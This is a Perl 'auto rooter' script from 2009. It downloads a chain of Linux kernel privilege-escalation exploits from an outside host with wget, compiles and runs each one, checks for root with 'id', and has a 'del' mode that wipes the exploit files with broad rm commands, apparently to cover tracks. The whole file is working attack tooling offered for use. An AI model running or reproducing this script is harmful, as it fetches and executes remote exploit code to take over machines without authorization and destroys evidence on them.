#!/usr/bin/perl
#Coded By CrosS ( 2009 Linux Auto r00t3r )
print "###########################################################\n";
print "# Auto rooter by CrosS #\n";
print "# Usage : #\n";
print "# perl $0 root => To root #\n";
print "# perl $0 del => Delete Exploits #\n";
print "# #\n";
print "# #\n";
print "###########################################################\n\n\n";

if ($ARGV[0] =~ "root" )
{
system("wget http://files.ayazoglu.org/Root/2009Root/iskorpitx");
system("chmod 777 iskorpitx");
system("./iskorpitx");
system("id");
system("wget http://files.ayazoglu.org/Root/2009Root/2.6.17.c");
system("gcc -o qaaz 2.6.17.c");
system("chmod 777 qaaz");
system("./qaaz");
system("id");
system("wget http://files.ayazoglu.org/Root/2009Root/2.6.18-2009.c");
system("gcc -o Digital 2.6.18-2009.c");
system("chmod 777 Digital");
system("./Digital");
system("id");
system("wget http://files.ayazoglu.org/Root/2009Root/2.6.28.3-2009.c");
system("gcc -o antifork 2.6.28.3-2009.c");
system("chmod 777 antifork");
system("./antifork");
system("id");
system("wget http://files.ayazoglu.org/Root/2009Root/enlightenment.tgz;tar xzf enlightenment.tgz;cd enlightenment");
system("sed -i '/turn_\(on\|off\)_wp();/d' exploit.c");
system("chmod 777 run_null_exploits.sh;chmod 777 run_nonnull_exploits.sh");
system("./run_null_exploits.sh");
system("wget http://files.ayazoglu.org/Root/2009Root/wunderbar_emporium2.tgz;tar xzf wunderbar_emporium2.tgz;cd wunderbar_emporium");
system("sed -i '/turn_\(on\|off\)_wp();/d' exploit.c");
system("sed -i '/turn_\(on\|off\)_wp();/d' pwnkernel.c");
system("chmod 777 wunderbar_emporium.sh");
system("./wunderbar_emporium.sh");
system("id");
system("wget http://files.ayazoglu.org/Root/2009Root/local-root-exploit-gayros.c");
system("gcc -o gayros local-root-exploit-gayros.c");
system("chmod 777 gayros");
system("./gayros");
system("wget http://files.ayazoglu.org/Root/2009Root/rad-e.c");
system("gcc -o rad-e rad-e.c");
system("chmod 777 rad-e");
system("./rad-e");
system("id");
}
if ($ARGV[0] =~ "del" )
{
print "All Exploit deleting �\n";
system("rm *.so*;rm *.c*;rm *.h*;rm *.sh*;rm exploit*;rm root*;rm gayros*;rm rad-e*;rm iskorpitx*;rm qaaz*;rm 2.6.17.c*;rm 2.6.18-2009.c*;rm Digital*;rm 2.6.28.3-2009.c*;rm antifork*;rm enlightenment.tgz*;rm -rf enlightenment*;rm wunderbar_emporium2.tgz*;rm -rf wunderbar_emporium2*");
}